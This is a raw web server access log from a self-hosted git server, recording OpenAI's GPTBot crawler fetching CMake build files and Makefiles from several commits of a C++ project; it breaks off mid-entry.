"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" +[17/Feb/2026:15:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11263] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:15:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10072] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11268] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39742] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 